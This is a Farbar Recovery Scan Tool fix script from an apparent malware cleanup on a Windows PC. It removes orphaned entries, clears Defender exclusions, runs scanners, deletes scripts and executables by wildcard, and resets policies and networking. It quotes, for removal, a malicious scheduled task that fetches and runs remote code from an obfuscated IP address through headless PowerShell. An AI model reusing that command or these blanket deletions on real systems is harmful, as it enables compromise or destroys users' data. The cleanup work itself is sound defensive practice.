Start::
CloseProcesses:
2026-06-11 18:51 - 2026-06-11 23:57 - 000000000 ____D C:\WINDOWS\system32\Tasks\InteractiveServices
AlternateDataStreams: C:\WINDOWS\tracing:? [16]
AlternateDataStreams: C:\Users\Administrator\Desktop\FRSTEnglish.exe:MBAM.Zone.Identifier [225]
AlternateDataStreams: C:\Users\User\Desktop\Procmon.exe:MBAM.Zone.Identifier [136]
FirewallRules: [{24D633F8-434B-475B-9451-47FAB63C511C}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe => No File
FirewallRules: [{9CE8B2A5-8E4C-4300-92F1-E1C8CB969888}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe => No File
FirewallRules: [{86DCA411-A607-4341-B3A0-9781E518A0ED}] => (Allow) D:\BACKUP D\Vidya\Mr DJ\The Sims 2 Ultimate Collection\The Sims 2 Mansion and Garden Stuff\TSBin\Sims2EP9.exe => No File
FirewallRules: [{D01C2DC3-0DCD-46FB-B1F4-D5B59C533EC5}] => (Allow) D:\BACKUP D\Vidya\Mr DJ\The Sims 2 Ultimate Collection\The Sims 2 Mansion and Garden Stuff\TSBin\Sims2EP9.exe => No File
FirewallRules: [{1E0901C5-5318-465F-BBF8-45304C112E5B}] => (Allow) D:\BACKUP D\Vidya\Mr DJ\The Sims 2 Ultimate Collection\The Sims 2 Mansion and Garden Stuff\CSBin\TS2BodyShop.exe => No File
FirewallRules: [{9976D0C9-D737-443F-8A98-2DB0EAF63294}] => (Allow) D:\BACKUP D\Vidya\Mr DJ\The Sims 2 Ultimate Collection\The Sims 2 Mansion and Garden Stuff\CSBin\TS2BodyShop.exe => No File
FirewallRules: [TCP Query User{37DD0221-F5B4-4DE0-9795-89174CA7BF48}F:\kingdom come deliverance ii\bin\win64mastermastersteampgo\kingdomcome.exe] => (Block) F:\kingdom come deliverance ii\bin\win64mastermastersteampgo\kingdomcome.exe => No File
FirewallRules: [UDP Query User{E5BC1E9A-ED29-4C51-93B1-B8EB6045A333}F:\kingdom come deliverance ii\bin\win64mastermastersteampgo\kingdomcome.exe] => (Block) F:\kingdom come deliverance ii\bin\win64mastermastersteampgo\kingdomcome.exe => No File
FirewallRules: [TCP Query User{FF98FFBE-6E06-47C9-9856-133C45183052}F:\steamlibrary\steamapps\common\palworld\pal\binaries\win64\palworld-win64-shipping.exe] => (Block) F:\steamlibrary\steamapps\common\palworld\pal\binaries\win64\palworld-win64-shipping.exe => No File
FirewallRules: [UDP Query User{66615B08-56B8-42C2-BFD2-E26F10C65042}F:\steamlibrary\steamapps\common\palworld\pal\binaries\win64\palworld-win64-shipping.exe] => (Block) F:\steamlibrary\steamapps\common\palworld\pal\binaries\win64\palworld-win64-shipping.exe => No File
FirewallRules: [TCP Query User{F05C0C57-4CB6-4C54-BF56-870878CC2A1D}D:\backup d\vidya\warhammer 40,000 dawn of war ii - retribution\dow2.exe] => (Block) D:\backup d\vidya\warhammer 40,000 dawn of war ii - retribution\dow2.exe => No File
FirewallRules: [UDP Query User{9BD9A646-9A8B-4EA5-95EA-36394A69243B}D:\backup d\vidya\warhammer 40,000 dawn of war ii - retribution\dow2.exe] => (Block) D:\backup d\vidya\warhammer 40,000 dawn of war ii - retribution\dow2.exe => No File
FirewallRules: [TCP Query User{14F5DDDE-7BD4-4581-B329-0EB9541B4C1C}F:\steamlibrary\steamapps\common\coral island\projectcoral\binaries\win64\projectcoral-win64-shipping.exe] => (Block) F:\steamlibrary\steamapps\common\coral island\projectcoral\binaries\win64\projectcoral-win64-shipping.exe => No File
FirewallRules: [UDP Query User{2B7CA622-83D2-4CB8-A00A-259F8D09DC35}F:\steamlibrary\steamapps\common\coral island\projectcoral\binaries\win64\projectcoral-win64-shipping.exe] => (Block) F:\steamlibrary\steamapps\common\coral island\projectcoral\binaries\win64\projectcoral-win64-shipping.exe => No File
FirewallRules: [TCP Query User{12A2B8C5-4381-4C9C-B40D-F229099E614A}F:\steamlibrary\steamapps\common\baldurs gate 3\bin\bg3_dx11.exe] => (Block) F:\steamlibrary\steamapps\common\baldurs gate 3\bin\bg3_dx11.exe => No File
FirewallRules: [UDP Query User{E273DF1B-A181-4F69-B637-D6CA273C45D9}F:\steamlibrary\steamapps\common\baldurs gate 3\bin\bg3_dx11.exe] => (Block) F:\steamlibrary\steamapps\common\baldurs gate 3\bin\bg3_dx11.exe => No File
FirewallRules: [{48B22EC7-49D4-465E-93C2-4E656951DD01}] => (Block) D:\steamlibrary\steamapps\common\projectzomboid\projectzomboid64.exe => No File
FirewallRules: [{A9D3DF8E-E5B2-4E21-963B-3A683D81F243}] => (Block) D:\steamlibrary\steamapps\common\projectzomboid\projectzomboid64.exe => No File
FirewallRules: [TCP Query User{2586868E-9DCD-4DFE-BF66-DDFFA5AC3C51}D:\steamlibrary\steamapps\common\projectzomboid\jre64\bin\java.exe] => (Allow) D:\steamlibrary\steamapps\common\projectzomboid\jre64\bin\java.exe => No File
FirewallRules: [UDP Query User{BAC7AFBF-DFE0-498F-B9BC-5BD69B07D8CB}D:\steamlibrary\steamapps\common\projectzomboid\jre64\bin\java.exe] => (Allow) D:\steamlibrary\steamapps\common\projectzomboid\jre64\bin\java.exe => No File
FirewallRules: [{CA53B6CD-210E-45C1-839C-98DCE736C02B}] => (Block) D:\steamlibrary\steamapps\common\projectzomboid\jre64\bin\java.exe => No File
FirewallRules: [{29F4E880-2DA7-40D5-BFD4-24E6B7C289F7}] => (Block) D:\steamlibrary\steamapps\common\projectzomboid\jre64\bin\java.exe => No File
FirewallRules: [TCP Query User{D73AC390-7C62-4EF2-AE59-81438D4968CC}D:\backup d\vidya\darkest dungeon two\darkest dungeon® ii\darkest dungeon ii.exe] => (Block) D:\backup d\vidya\darkest dungeon two\darkest dungeon® ii\darkest dungeon ii.exe => No File
FirewallRules: [UDP Query User{F9A501B3-FA95-4221-B8B8-5E6F17F0C5F3}D:\backup d\vidya\darkest dungeon two\darkest dungeon® ii\darkest dungeon ii.exe] => (Block) D:\backup d\vidya\darkest dungeon two\darkest dungeon® ii\darkest dungeon ii.exe => No File
FirewallRules: [TCP Query User{240EFDCE-E810-4F32-9335-F55C3A9EF1E7}D:\backup d\darkest dungeon ii\darkest dungeon ii.exe] => (Block) D:\backup d\darkest dungeon ii\darkest dungeon ii.exe => No File
FirewallRules: [UDP Query User{01307CF8-F6A0-413F-B80E-D102702DDC6E}D:\backup d\darkest dungeon ii\darkest dungeon ii.exe] => (Block) D:\backup d\darkest dungeon ii\darkest dungeon ii.exe => No File
FirewallRules: [TCP Query User{A5D8987B-E518-4E09-9AF2-C9EF4DEE7674}D:\backup d\vidya\darkest dungeon 2\darkest dungeon® ii\darkest dungeon ii.exe] => (Block) D:\backup d\vidya\darkest dungeon 2\darkest dungeon® ii\darkest dungeon ii.exe => No File
FirewallRules: [UDP Query User{B0F5308B-4E7A-4915-B894-A0D55A87FBDC}D:\backup d\vidya\darkest dungeon 2\darkest dungeon® ii\darkest dungeon ii.exe] => (Block) D:\backup d\vidya\darkest dungeon 2\darkest dungeon® ii\darkest dungeon ii.exe => No File
HKLM\...\Run: [AdobeGCInvoker-1.0] => "C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe" (No File)
HKU\S-1-5-21-1243298227-4161206674-1662115356-500\...\RunOnce: [Delete Cached Standalone Update Binary] => C:\WINDOWS\system32\cmd.exe /q /c del /q "C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe" (No File)
Task: {BBD85A06-FBCD-4D4F-A94A-0D202F640A07} - System32\Tasks\AdobeGCInvoker-1.0 => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe -mode=scheduled (No File)
FF Plugin: wacom.com/WacomTabletPlugin -> C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll [No File]
FF Plugin-x32: wacom.com/WacomTabletPlugin -> C:\Program Files (x86)\TabletPlugins\npWacomTabletPlugin.dll [No File]
S2 AGMService; "C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe" (No File)
S2 AGSService; "C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe" (No File)
S3 EABackgroundService; C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EABackgroundService.exe (No File)
S3 EasyAntiCheat; "C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe" (No File)
S3 EasyAntiCheat_EOS; "C:\Program Files (x86)\EasyAntiCheat_EOS\EasyAntiCheat_EOS.exe" (No File)
S3 Origin Client Service; "C:\Program Files (x86)\Origin\OriginClientService.exe" (No File)
S2 Origin Web Helper Service; "C:\Program Files (x86)\Origin\OriginWebHelperService.exe" (No File)
S3 MpKsl2c4334fb; \??\C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{00F48D75-9834-4F71-83F0-945AE30195DE}\MpKslDrv.sys (No File)
S3 MpKsl475d2c1d; \??\C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{00F48D75-9834-4F71-83F0-945AE30195DE}\MpKslDrv.sys (No File)
HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
Task: {CBDF7FFD-2CE6-4C42-AB23-88FD2CB970B3} - System32\Tasks\InteractiveServices\SystemWebExtensionsDesignTask.CL-NCLS-1-5-21-1243298227-4161206674-1662115356-1001 => C:\Windows\System32\conhost.exe [867840 2024-12-29] (Microsoft Windows -> Microsoft Corporation) -> --headless powershell -NoProfile -ExecutionPolicy Bypass -Command "irm 0207.0265.0133.0366/a | iex" <==== ATTENTION
File: C:\Windows\system32\NCS2Setp.dll
Comment: This snippet removes all Windows Defender exclusions
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\TemporaryPaths
StartPowershell:
Try {
    # Enumerate the current Defender exclusions of each type
    $Paths = (Get-MpPreference).ExclusionPath
    $Extensions = (Get-MpPreference).ExclusionExtension
    $Processes = (Get-MpPreference).ExclusionProcess
    # Remove every exclusion; -ErrorAction Stop makes any failure land in the Catch block
    foreach ($Path in $Paths) {
        Remove-MpPreference -ExclusionPath $Path -Force -ErrorAction Stop
    }
    foreach ($Extension in $Extensions) {
        Remove-MpPreference -ExclusionExtension $Extension -Force -ErrorAction Stop
    }
    foreach ($Process in $Processes) {
        Remove-MpPreference -ExclusionProcess $Process -Force -ErrorAction Stop
    }
}
Catch {
    Write-Error "Error occurred while removing Windows Defender exclusions: $_"
}
EndPowershell:
StartPowershell:
# Replace /scanonly with /clean if you also want to delete items. However, this activates a trial license on the system, so I do not recommend it.
$hmpExe = "$env:TEMP\HitmanPro_x64.exe"
$logFile = "$env:TEMP\HitmanPro_ScanLog.txt"
Invoke-WebRequest -Uri "https://dl.surfright.nl/HitmanPro_x64.exe" -OutFile $hmpExe -UseBasicParsing
$proc = Start-Process $hmpExe -ArgumentList "/ews","/scanonly","/noinstall","/log=`"$logFile`"","/logtype=txt" -Wait -PassThru
if (!(Test-Path $logFile)) { Write-Host "Scan failed (exit $($proc.ExitCode))"; exit 1 }
Get-Content $logFile -Encoding Unicode
EndPowershell:
StartPowershell:
# Downloads the newest AdwCleaner version directly from Malwarebytes, performs an update, scans, cleans and writes the log to the console
# Does not clean preinstalled objects, only PUP/Adware
# If you would like to delete preinstalled objects as well, add /preinstalled after the /clean argument
# If you would like to only scan with it, change the argument from /clean to /scan
# NOTE: For users from Asia (primarily China), do not use the clean option. It will very likely remove a lot of their important software.
New-Item -ItemType Directory -Force -Path "$env:SystemDrive\AdwCleaner" | Out-Null
Invoke-WebRequest -Uri "https://adwcleaner.malwarebytes.com/adwcleaner?channel=release" -OutFile "$env:SystemDrive\AdwCleaner\AdwCleanerFRST.exe"
Start-Process -FilePath "$env:SystemDrive\AdwCleaner\AdwCleanerFRST.exe" -ArgumentList "/eula" -Wait -WindowStyle Hidden
$logFile = "$env:SystemDrive\AdwCleaner\AdwCleanerOutputFRST.txt"
Start-Process -FilePath "$env:SystemDrive\AdwCleaner\AdwCleanerFRST.exe" -ArgumentList "/noreboot /clean" -Wait -WindowStyle Hidden -RedirectStandardOutput $logFile
Get-Content $logFile -Encoding Unicode
Remove-Item -Path $logFile -Force -ErrorAction SilentlyContinue
EndPowershell:
Comment: Verify that Discord does not have any injected code that intercepts personal data. If anything is printed here, check that it is not malicious code.
Powershell: @("$env:APPDATA","$env:LOCALAPPDATA") | ForEach-Object { Get-ChildItem $_ -Recurse -Filter "index.js" -ErrorAction SilentlyContinue } | Where-Object { $_.FullName -match "discord_desktop_core" } | ForEach-Object { $content = [string](Get-Content $_.FullName -Raw); Write-Host "--- $($_.FullName) ---"; $content.Substring(0,[Math]::Min(2000,$content.Length)) }
Comment: Remove unwanted files from common folders using Farbar's native removal (including removal on reboot if needed). Please double-check that the user does not have any applications incorrectly installed in the directories listed below.
C:\ProgramData\*.a3x
C:\ProgramData\*.ahk
C:\ProgramData\*.au3
C:\ProgramData\*.bat
C:\ProgramData\*.cab
C:\ProgramData\*.cmd
C:\ProgramData\*.com
C:\ProgramData\*.dll
C:\ProgramData\*.exe
C:\ProgramData\*.hta
C:\ProgramData\*.jar
C:\ProgramData\*.js
C:\ProgramData\*.jse
C:\ProgramData\*.lnk
C:\ProgramData\*.pif
C:\ProgramData\*.ps1
C:\ProgramData\*.py
C:\ProgramData\*.pyc
C:\ProgramData\*.pyd
C:\ProgramData\*.scr
C:\ProgramData\*.tmp
C:\ProgramData\*.vbe
C:\ProgramData\*.vbs
C:\ProgramData\*.wsf
C:\ProgramData\*.wsh
C:\ProgramData\*.zip
C:\ProgramData\*.rar
C:\ProgramData\*.7z
C:\Users\*\AppData\Roaming\*.au3
C:\Users\*\AppData\Roaming\*.bat
C:\Users\*\AppData\Roaming\*.cab
C:\Users\*\AppData\Roaming\*.cmd
C:\Users\*\AppData\Roaming\*.com
C:\Users\*\AppData\Roaming\*.dll
C:\Users\*\AppData\Roaming\*.exe
C:\Users\*\AppData\Roaming\*.hta
C:\Users\*\AppData\Roaming\*.jar
C:\Users\*\AppData\Roaming\*.js
C:\Users\*\AppData\Roaming\*.jse
C:\Users\*\AppData\Roaming\*.lnk
C:\Users\*\AppData\Roaming\*.pif
C:\Users\*\AppData\Roaming\*.ps1
C:\Users\*\AppData\Roaming\*.py
C:\Users\*\AppData\Roaming\*.pyc
C:\Users\*\AppData\Roaming\*.pyd
C:\Users\*\AppData\Roaming\*.scr
C:\Users\*\AppData\Roaming\*.tmp
C:\Users\*\AppData\Roaming\*.vbe
C:\Users\*\AppData\Roaming\*.vbs
C:\Users\*\AppData\Roaming\*.wsf
C:\Users\*\AppData\Roaming\*.wsh
C:\Users\*\AppData\Roaming\*.zip
C:\Users\*\AppData\Roaming\*.rar
C:\Users\*\AppData\Roaming\*.7z
C:\Users\CurrentUserName\AppData\Local\*.a3x
C:\Users\CurrentUserName\AppData\Local\*.ahk
C:\Users\CurrentUserName\AppData\Local\*.au3
C:\Users\CurrentUserName\AppData\Local\*.bat
C:\Users\CurrentUserName\AppData\Local\*.cab
C:\Users\CurrentUserName\AppData\Local\*.cmd
C:\Users\CurrentUserName\AppData\Local\*.com
C:\Users\CurrentUserName\AppData\Local\*.dll
C:\Users\CurrentUserName\AppData\Local\*.exe
C:\Users\CurrentUserName\AppData\Local\*.hta
C:\Users\CurrentUserName\AppData\Local\*.jar
C:\Users\CurrentUserName\AppData\Local\*.js
C:\Users\CurrentUserName\AppData\Local\*.jse
C:\Users\CurrentUserName\AppData\Local\*.lnk
C:\Users\CurrentUserName\AppData\Local\*.pif
C:\Users\CurrentUserName\AppData\Local\*.ps1
C:\Users\CurrentUserName\AppData\Local\*.py
C:\Users\CurrentUserName\AppData\Local\*.pyc
C:\Users\CurrentUserName\AppData\Local\*.pyd
C:\Users\CurrentUserName\AppData\Local\*.scr
C:\Users\CurrentUserName\AppData\Local\*.tmp
C:\Users\CurrentUserName\AppData\Local\*.vbe
C:\Users\CurrentUserName\AppData\Local\*.vbs
C:\Users\CurrentUserName\AppData\Local\*.wsf
C:\Users\CurrentUserName\AppData\Local\*.wsh
C:\Users\CurrentUserName\AppData\Local\*.zip
C:\Users\CurrentUserName\AppData\Local\*.rar
C:\Users\CurrentUserName\AppData\Local\*.7z
C:\Users\CurrentUserName\AppData\Roaming\*.a3x
C:\Users\CurrentUserName\AppData\Roaming\*.ahk
C:\Users\CurrentUserName\AppData\Roaming\*.au3
C:\Users\CurrentUserName\AppData\Roaming\*.bat
C:\Users\CurrentUserName\AppData\Roaming\*.cab
C:\Users\CurrentUserName\AppData\Roaming\*.cmd
C:\Users\CurrentUserName\AppData\Roaming\*.com
C:\Users\CurrentUserName\AppData\Roaming\*.dll
C:\Users\CurrentUserName\AppData\Roaming\*.exe
C:\Users\CurrentUserName\AppData\Roaming\*.hta
C:\Users\CurrentUserName\AppData\Roaming\*.jar
C:\Users\CurrentUserName\AppData\Roaming\*.js
C:\Users\CurrentUserName\AppData\Roaming\*.jse
C:\Users\CurrentUserName\AppData\Roaming\*.lnk
C:\Users\CurrentUserName\AppData\Roaming\*.pif
C:\Users\CurrentUserName\AppData\Roaming\*.ps1
C:\Users\CurrentUserName\AppData\Roaming\*.py
C:\Users\CurrentUserName\AppData\Roaming\*.pyc
C:\Users\CurrentUserName\AppData\Roaming\*.pyd
C:\Users\CurrentUserName\AppData\Roaming\*.scr
C:\Users\CurrentUserName\AppData\Roaming\*.tmp
C:\Users\CurrentUserName\AppData\Roaming\*.vbe
C:\Users\CurrentUserName\AppData\Roaming\*.vbs
C:\Users\CurrentUserName\AppData\Roaming\*.wsf
C:\Users\CurrentUserName\AppData\Roaming\*.wsh
C:\Users\CurrentUserName\AppData\Roaming\*.zip
C:\Users\CurrentUserName\AppData\Roaming\*.rar
C:\Users\CurrentUserName\AppData\Roaming\*.7z
Comment: Force policy removal
C:\Windows\System32\GroupPolicyUsers
C:\Windows\System32\GroupPolicy
Comment: System repair commands
CMD: DISM.exe /Online /Cleanup-image /Restorehealth
CMD: SFC.exe /scannow
Comment: Network reset commands
CMD: netsh int ip reset
CMD: netsh int ipv6 reset
CMD: ipconfig /flushDNS
CMD: netsh winsock reset catalog
Comment: Additional temp file removal
C:\Windows\System32\config\systemprofile\AppData\Local\*.tmp
C:\WINDOWS\system32\*.tmp
C:\WINDOWS\syswow64\*.tmp
C:\Users\CurrentUserName\AppData\Local\Temp\*
C:\Windows\Temp\*
C:\Windows\SystemTemp\*
EmptyTemp:
End::